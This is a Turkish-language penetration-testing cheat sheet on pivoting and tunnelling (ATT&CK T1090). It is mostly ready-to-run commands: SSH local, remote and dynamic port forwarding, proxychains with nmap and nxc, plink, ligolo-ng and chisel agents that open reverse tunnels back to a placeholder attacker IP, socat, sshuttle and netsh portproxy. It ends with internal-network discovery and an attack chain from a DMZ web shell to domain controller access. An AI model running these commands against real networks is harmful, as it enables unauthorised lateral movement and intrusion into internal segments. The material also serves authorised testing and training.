Pivoting & Tünelleme
ATT&CK T1090 difficulty: orta
Pivoting, ele geçirilen bir hostu köprü olarak kullanıp normalde erişilemeyen iç ağ segmentlerine ulaşmaktır (T1090). Tünelleme ile tarayıcı, nmap, nxc ve exploit araçlarını bu segmentlere yönlendirirsin.
Ön koşullar
Section titled “Ön koşullar”- Pivot host'ta shell (SSH, WinRM, beacon, web shell)- Pivot'un ikinci NIC / route ile hedef ağı görmesi- Saldırgan ↔ pivot arasında çıkış (ters tünel sık gerekir)ip a; ip route; arp -aipconfig /allroute printSSH tabanlı forwarding
Section titled “SSH tabanlı forwarding”ssh -L 8080:10.10.20.5:80 user@pivotcurl http://127.0.0.1:8080/ssh -L 4450:10.10.20.5:445 -L 3389:10.10.20.8:3389 user@pivotssh -R 9001:127.0.0.1:9001 user@pivotssh -D 1080 user@pivotssh -D 1080 -N -f user@pivotssh -J user@pivot user@10.10.20.5ssh -o ProxyCommand="ssh -W %h:%p user@pivot" user@10.10.20.5proxychains:
# socks5 127.0.0.1 1080proxychains nmap -sT -Pn -p 445,3389 10.10.20.5proxychains nxc smb 10.10.20.5 -u user -p passWindows pivot’ta OpenSSH veya plink:
plink.exe -D 1080 user@attackerplink.exe -R 1080:127.0.0.1:1080 user@attackerAjan tabanlı (chisel / ligolo-ng)
Section titled “Ajan tabanlı (chisel / ligolo-ng)”-
ligolo-ng — TUN arayüzü; proxychains’siz doğal IP erişimi:
Terminal window sudo ip tuntap add user $USER mode tun ligoloTerminal window sudo ip link set ligolo upTerminal window ./proxy -selfcertTerminal window ./agent -connect SALDIRGAN_IP:11601 -ignore-certTerminal window sessionTerminal window ifconfig # pivot arayüzlerini görTerminal window startTerminal window sudo ip route add 10.10.20.0/24 dev ligoloTerminal window nmap -Pn 10.10.20.5 # doğrudan -
chisel — HTTP(S) üzerinden reverse SOCKS/port:
Terminal window ./chisel server -p 8000 --reverseTerminal window ./chisel client SALDIRGAN_IP:8000 R:socksTerminal window ./chisel client SALDIRGAN_IP:8000 R:445:10.10.20.5:445 -
Çok katman — pivot1 → pivot2 zinciri; ligolo’da birden fazla session, SSH -J hop, veya chisel’i ikinci hop’ta tekrar çalıştır.
Diğer teknikler
Section titled “Diğer teknikler”socat TCP-LISTEN:4450,fork TCP:10.10.20.5:445sshuttle -r user@pivot 10.10.20.0/24netsh interface portproxy add v4tov4 listenport=8080 \ listenaddress=0.0.0.0 connectport=80 connectaddress=10.10.20.5Pivot sonrası keşif
Section titled “Pivot sonrası keşif”nmap -sn 10.10.20.0/24nxc smb 10.10.20.0/24nslookup -type=SRV _ldap._tcp.dc._msdcs.hedef.localKomut üreteci
Section titled “Komut üreteci”SSH Dynamic Proxy
embedded toolGenerated command
ssh -D 1080 -N user@10.10.10.5SSH Dynamic Proxy
Section titled “SSH Dynamic Proxy”Saldırı zinciri
Section titled “Saldırı zinciri”DMZ web shell → chisel R:socks → nxc smb 10.10.20.0/24 → ligolo TUN + route → DC / backup VLAN erişimi